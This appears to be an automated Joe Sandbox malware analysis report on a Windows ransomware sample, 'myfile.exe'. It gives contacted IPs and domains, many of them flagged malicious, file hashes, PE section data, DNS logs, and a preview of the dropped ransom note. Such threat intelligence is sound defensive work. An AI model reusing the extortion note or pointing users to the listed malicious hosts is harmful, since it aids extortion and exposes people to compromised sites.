https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-medium.otf)	myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://innervisions-id.com/wp-content/images/kpgkqb.jpg/g	myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
160.153.0.131	lashandbrowenvy.com	United States	21501	GODADDY-AMSDE	true
160.153.0.174	bayshoreelite.com	United States	21501	GODADDY-AMSDE	true
95.130.22.108	mursall.de	Germany	13246	INETWIRE-ASWilhelm-Wagenfeld-Str16DE	true
172.67.71.217	altitudetrampolinepark.com	United States	13335	CLOUDFLARENETUS	false
80.158.2.41	oscommunity.de	Germany	6878	AS6878DE	true
208.73.140.70	karnesstanleyhvac.com	United States	32425	SKB3-ARIN-BGPUS	true
52.215.137.200	georgemuncey.com	United States	16509	AMAZON-02US	true
95.215.226.251	innervisions-id.com	United Kingdom	9009	M247GB	true
85.10.140.71	relevantonline.eu	France	21283	A1SI-ASA1SlovenijaSI	true
192.0.78.13	lb.wordpress.com	United States	2635	AUTOMATTICUS	false
198.185.159.145	almamidwifery.com	United States	53831	SQUARESPACEUS	true
185.68.16.21	maxcube24.com.ua	Ukraine	200000	UKRAINE-ASUA	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
87.118.122.41	lexced.com	Germany	31103	KEYWEB-ASDE	true
46.242.240.159	skoczynski.eu	Poland	12824	HOMEPL-ASPL	true
35.215.83.253	parksideseniorliving.net	United States	19527	GOOGLE-2US	true
185.58.213.84	rsidesigns.com	Denmark	201595	MONODK	true
217.160.0.18	magrinya.net	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
138.201.61.68	afbudsrejserallinclusive.dk	Germany	24940	HETZNER-ASDE	true
172.67.158.62	princebet88.site	United States	13335	CLOUDFLARENETUS	false
109.237.132.56	holocine.de	Germany	45012	CLOUDPITDE	true
85.92.72.56	nbva.co.uk	United Kingdom	34282	UKNOC-ASGB	true
23.236.62.147	c-sprop.com	United States	15169	GOOGLEUS	false
188.246.227.29	abulanov.com	Russian Federation	50340	SELECTEL-MSKRU	true
188.40.30.106	business-basic.de	Germany	24940	HETZNER-ASDE	true
89.116.147.189	m2graph.fr	Lithuania	15419	LRTC-ASLT	true
188.114.97.3	altitudeboise.com	European Union	13335	CLOUDFLARENETUS	true
141.95.251.157	stage-infirmier.fr	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	true
89.108.65.79	pansionatblago.ru	Russian Federation	197695	AS-REGRU	true
51.15.159.75	chainofhopeeurope.eu	France	12876	OnlineSASFR	true
188.114.96.3	testitjavertailut.net	European Union	13335	CLOUDFLARENETUS	true
35.214.211.239	bundan.com	United States	19527	GOOGLE-2US	true
134.209.129.254	vitoriaecoturismo.com.br	United States	14061	DIGITALOCEAN-ASNUS	true
185.15.78.186	hostaletdelsindians.es	Spain	48348	CLOUDBUILDERSES	true
104.26.0.120	www.altitudetrampolinepark.com	United States	13335	CLOUDFLARENETUS	false
35.214.166.193	www.mieleshopping.it	United States	19527	GOOGLE-2US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1507821
Start date and time:	2024-09-09 12:05:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	myfile.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/287@54/36
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:07:04	API Interceptor	33x Sleep call for process: myfile.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.0.78.13	http://janecreativetileimp.wordpress.com/	Get hash	malicious	Unknown	Browse	janecreativetileimp.wordpress.com/
192.0.78.13	http://deanthapillaystrategyinsights.wordpress.com	Get hash	malicious	Unknown	Browse	deanthapillaystrategyinsights.wordpress.com/
198.185.159.145	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	198.185.159.145/
	firmware.i586.elf	Get hash	malicious	Unknown	Browse	198.185.159.145/
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	uwemusic.com/
	FXja4SyAYs.exe	Get hash	malicious	Unknown	Browse	familycompany.net/index.php
	FXja4SyAYs.exe	Get hash	malicious	Unknown	Browse	familycompany.net/index.php
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf	Get hash	malicious	FormBook	Browse	www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
	BWV4hz5GdR.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	resolvedcx.com/PhpMyAdmin/
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	mwpmedia.com/admin/
	a5hbkmGD7N.exe	Get hash	malicious	Pushdo	Browse	riwn.org/
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	fullertonlaw.com/admin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lb.wordpress.com	http://anikettiwari47.github.io/Netflix	Get hash	malicious	HTMLPhisher	Browse	192.0.78.12
	https://securemetamaskvallet.webflow.io/	Get hash	malicious	Unknown	Browse	192.0.78.12
	https://beepeople.com.br/wp-login.php?action=rp&key=A3iAn20LIOulNyvDirfj&login=www.bgdrnq.blogspot.fr%20-%20107%20156%20USD%20BTC%20i2jqdl	Get hash	malicious	Unknown	Browse	192.0.78.13
	https://kidsandcompany1.wordpress.com/	Get hash	malicious	Unknown	Browse	192.0.78.12
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	192.0.78.13
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	192.0.78.12
	https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.com	Get hash	malicious	Unknown	Browse	192.0.78.13
	http://janecreativetileimp.wordpress.com/	Get hash	malicious	Unknown	Browse	192.0.78.13
	https://www.sql-server-performance.com/cannot-use-textimage-on/	Get hash	malicious	HtmlDropper	Browse	192.0.78.12
	http://deanthapillaystrategyinsights.wordpress.com	Get hash	malicious	Unknown	Browse	192.0.78.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://s3.ap-southeast-1.amazonaws.com/gdapp-assets-sg/8f2be995-cd87-4d9c-9a62-232c61abe5bb.html	Get hash	malicious	Unknown	Browse	104.21.82.51
	https://skalldyr-my.sharepoint.com/:o:/p/post/EtdITQs4FcRGgNgd61rFkBIBoV1oMjyUbwcDJQUAXGgzAA?e=dpLrAe	Get hash	malicious	Unknown	Browse	104.18.94.41
	http://om.ciheam.org/om/pdf/a79/00800645.pdf	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2f3d1.gmobb.jp%2fdcm299ccyag4e%2fgov&umid=c9da0305-3df1-4ca9-b55d-4eb1dc21d559&auth=e8718e3df01d3f6f6a26ecc437e1fe16569b02b3-ce2cb0a9999be4b21ec568df281766cb7c88743e	Get hash	malicious	Phisher	Browse	104.18.86.42
	Doc_PO6900000827.exe	Get hash	malicious	FormBook	Browse	172.67.192.227
	#U0130#U015eLEM #U00d6ZET#U0130_110602407178699-1034 nolu TICARI -e-Banka_563028621286.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	DBG1435766.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://clicktogo.click/downloads/tr08	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://zenodo.org/records/12885815/files/modelo-contrato-prstamo-entre-familiares-sin-intereses-pdf.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	Documenti di spedizione 00028384.bat.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
INETWIRE-ASWilhelm-Wagenfeld-Str16DE	file.exe	Get hash	malicious	FormBook, GuLoader	Browse	95.130.17.35
	file.exe	Get hash	malicious	FormBook, GuLoader	Browse	95.130.17.35
	RHlXQuM27O.exe	Get hash	malicious	FormBook, GuLoader	Browse	95.130.17.35
	IMG-20230529-WA0004470000000000000000002023.exe	Get hash	malicious	FormBook	Browse	95.130.17.35
	details.exe	Get hash	malicious	FormBook, NSISDropper	Browse	95.130.17.35
	Potwierdzenie realizacji transakcji 65634634000000035322023.exe	Get hash	malicious	FormBook, NSISDropper	Browse	95.130.17.35
	PO_0033S2.exe	Get hash	malicious	FormBook, GuLoader	Browse	95.130.17.35
	RFQ 281OR41.doc	Get hash	malicious	FormBook	Browse	95.130.17.35
	PO#.exe	Get hash	malicious	FormBook	Browse	95.130.17.35
	Product Details.exe	Get hash	malicious	FormBook	Browse	95.130.17.35
GODADDY-AMSDE	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	160.153.0.44
	https://maddenturf.com/login-2/	Get hash	malicious	Unknown	Browse	160.153.0.81
	ocedures.msg	Get hash	malicious	Unknown	Browse	160.153.0.153
	Lisa_Sierra.lnk	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://326707096.lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	https://tradeguard.com/	Get hash	malicious	Unknown	Browse	160.153.0.168
	https://tradeguard.com/	Get hash	malicious	Unknown	Browse	160.153.0.168
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	160.153.0.62
GODADDY-AMSDE	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	160.153.0.44
	https://maddenturf.com/login-2/	Get hash	malicious	Unknown	Browse	160.153.0.81
	ocedures.msg	Get hash	malicious	Unknown	Browse	160.153.0.153
	Lisa_Sierra.lnk	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://326707096.lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	http://lisasierra.com	Get hash	malicious	Unknown	Browse	37.148.205.12
	https://tradeguard.com/	Get hash	malicious	Unknown	Browse	160.153.0.168
	https://tradeguard.com/	Get hash	malicious	Unknown	Browse	160.153.0.168
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	160.153.0.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	s.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	v.exe	Get hash	malicious	LummaC, Vidar	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	Armoury.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	l.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	Setup.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	Setup.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	Setup.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	Setup.exe	Get hash	malicious	LummaC	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	ZqCyroHbgC.exe	Get hash	malicious	Unknown	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193
	ZqCyroHbgC.exe	Get hash	malicious	Unknown	Browse	160.153.0.131 160.153.0.174 95.130.22.108 172.67.71.217 80.158.2.41 208.73.140.70 52.215.137.200 95.215.226.251 85.10.140.71 198.185.159.145 185.68.16.21 198.185.159.144 87.118.122.41 35.215.83.253 185.58.213.84 217.160.0.18 138.201.61.68 172.67.158.62 109.237.132.56 85.92.72.56 23.236.62.147 188.246.227.29 188.40.30.106 89.116.147.189 188.114.97.3 141.95.251.157 89.108.65.79 51.15.159.75 188.114.96.3 35.214.211.239 134.209.129.254 185.15.78.186 104.26.0.120 35.214.166.193

Process:	C:\Users\user\Desktop\myfile.exe
File Type:	data
Category:	dropped
Size (bytes):	6708
Entropy (8bit):	3.856369007359732
Encrypted:	false
SSDEEP:	96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
MD5:	2D835A381E24DE2F2BF39E1C3A476F28
SHA1:	C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
SHA-256:	954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
SHA-512:	7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
Malicious:	true
Reputation:	low
Preview:	-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.321034985158156
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	myfile.exe
File size:	164'864 bytes
MD5:	aaca0b25fa85ab4507d3861697824343
SHA1:	527c1dc2a340dd48652aec14a6316c7af0ff74c0
SHA256:	6727edbb5d6abee908851a8c5fd7b4aca6d664634fdcdfc15e04502b960abbc5
SHA512:	4c1982d2781b174b33375f57716c89a425e2660dd40484566e1c56af2f00a258c14022a7eda76278cdb530ce67adc5f74dfc010651deaa14165dd54fb1add6f2
SSDEEP:	3072:Hp5SexkWi1Lbi4eTMlwDCnu/qfgh9zIeZGm:JvGWwbnWJ/RfI2G
TLSH:	2BF3C0166E9001F7C9A742F1562B3FA7D2FEF939131515DF935088881F324D2BA2A63B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{i..{i..{i..%l..{i..%j..{i."%m..{i."%k..{i.Rich.{i.........................PE..L...\w.\.............................6.....

Entrypoint:	0x4036e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x5CFE775C [Mon Jun 10 15:29:32 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b000	0x54c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa2d4	0xa400	afb8170e2fd3b98574bcfb851bb9185c	False	0.5701219512195121	data	6.557481301352053	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0xf650	0xf800	cee02166b388e53d17575c562ec2bcb2	False	0.5037802419354839	data	6.439969289144318	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x179c	0x1600	8e933246b6d820599829816668c48ed8	False	0.9351917613636364	data	7.688811274301435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.s7bz	0x1e000	0xc800	0xc800	4e2a20f857eea27c82cffb20e0ed46a9	False	0.51802734375	zlib compressed data	5.096361715869261	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x2b000	0x54c	0x600	8e13393d944b9927f94e5ce4851f272d	False	0.7903645833333334	data	6.215323245776694	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 9, 2024 12:07:03.696229935 CEST	62566	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:03.716538906 CEST	53	62566	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:05.227942944 CEST	63342	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:05.237983942 CEST	53	63342	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:05.239343882 CEST	59221	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:05.270159960 CEST	53	59221	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:05.271363020 CEST	51482	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:05.281063080 CEST	53	51482	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:05.282861948 CEST	63656	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:05.295304060 CEST	53	63656	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:07.070254087 CEST	60155	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:07.082232952 CEST	53	60155	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:07.084769011 CEST	56962	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:07.457977057 CEST	53	56962	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:08.155585051 CEST	58800	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:08.323786974 CEST	53	58800	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:09.873889923 CEST	49738	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:09.911330938 CEST	53	49738	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:11.852992058 CEST	53628	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:11.901187897 CEST	53	53628	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:11.903928995 CEST	49243	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:12.064980984 CEST	53	49243	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:12.068695068 CEST	52469	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:12.102761030 CEST	53	52469	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:13.571923018 CEST	54758	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:13.615361929 CEST	53	54758	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:14.888868093 CEST	55256	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:14.922874928 CEST	53	55256	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:16.329658985 CEST	54101	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:16.556098938 CEST	53	54101	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:17.316670895 CEST	60970	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:17.329066992 CEST	53	60970	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:18.451149940 CEST	50372	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:18.487750053 CEST	53	50372	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:19.296350956 CEST	51228	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:19.333359003 CEST	53	51228	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:19.958678961 CEST	64615	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:19.973772049 CEST	53	64615	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:20.948771954 CEST	49681	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:21.000067949 CEST	53	49681	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:21.992017031 CEST	63881	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:22.216485977 CEST	53	63881	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:23.417171955 CEST	63510	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:23.446269035 CEST	53	63510	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:24.417653084 CEST	51476	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:24.430177927 CEST	53	51476	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:25.155900955 CEST	49445	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:25.205933094 CEST	53	49445	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:27.243017912 CEST	52690	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:27.253137112 CEST	53	52690	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:27.686656952 CEST	58035	53	192.168.2.4	1.1.1.1
